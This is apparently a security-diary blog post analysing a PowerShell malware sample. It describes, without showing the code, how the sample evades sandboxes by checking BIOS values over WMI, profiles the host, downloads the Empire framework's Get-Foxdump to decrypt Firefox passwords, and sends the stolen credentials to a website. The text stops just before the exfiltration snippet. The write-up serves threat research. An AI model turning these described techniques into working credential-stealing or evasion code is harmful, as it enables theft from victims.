InfoSec Handlers Diary Blog

Powershell is a great language that can interact at a low-level with Microsoft Windows. While hunting, I found a nice piece of Powershell code. After some deeper checks, it appeared that the code was not brand new but it remains interesting to learn how a malware infects (or not) a computer and tries to collect interesting data from the victim.

Notes:

1.The different snippets of code presented here are only for learning purposes
2. The code has been beautified

Usually, a malware will avoid to install itself on a virtualized environment (an automated sandbox or a security analyst's lab). A common way to detect a virtualized environment is to check BIOS values. Powershell can use query lot of operating system information through WMI[1].

It is useful to learn more about the victim, let’s grab some information about the computer and its network. You can also see how to detect if Powershell has admin rights and if the computer is a domain member.

The malware contains a password stealer for Firefox. It download another Powershell script that can decoded the Firefox passwords. Get-Foxdump is part of Empire framework[3]. Then the stolen credentials are exfiltrated to another website: